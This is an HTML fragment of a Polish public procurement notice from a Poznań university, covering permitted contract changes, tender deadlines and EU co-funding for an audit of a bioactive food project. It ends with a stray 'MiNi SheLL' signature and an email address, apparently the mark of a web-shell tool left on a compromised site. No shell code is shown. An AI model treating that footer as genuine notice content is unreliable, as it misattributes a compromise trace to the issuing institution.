<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w następujących przypadkach:
1.	zmiany zasad dokonywania odbioru przedmiotu zamówienia;
2.	zmian będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymania realizacji zamówienia przez Zamawiającego;
3.	siły wyższej uniemożliwiającej wykonanie zamówienia;
4.	w przypadku wystąpienia którejkolwiek z okoliczności wskazanej w pkt. 1, 3, termin wykonania umowy może ulec odpowiedniemu wydłużeniu o czas niezbędny do wykonania umowy w sposób należyty;
5.	zmiany terminów płatności wynikające z wszelkich zmian wprowadzonych do umowy.
6.	Zamawiający zastrzega możliwość przedłużenia okresu trwania projektu, w związku z powyższym okres będący przedmiotem drugiego etapu audytu może ulec wydłużeniu maksymalnie do 30.06.2015r. Wysokość dofinansowania oraz cele projektu nie ulegną zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać w formie papierowej od Zamawiającego w budynku Collegium Maximum Uniwersytetu Przyrodniczego ul. Wojska Polskiego 28, IV piętro pok. 407.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2014 godzina 10:00, miejsce: w budynku Collegium Maximum Uniwersytetu Przyrodniczego w Poznaniu ul. Wojska Polskiego 28, IV piętro pok. 407 Biuro Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt realizowany w ramach Programu Operacyjnego Innowacyjna Gospodarka lata 2007-2013, pt.: Nowa żywność bioaktywna o zaprogramowanych właściwościach prozdrowotnych wraz ze sprawozdaniem i opinią o projekcie realizowanego na podstawie umowy o dofinansowanie nr POIG.01.01.02-00-061/09.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com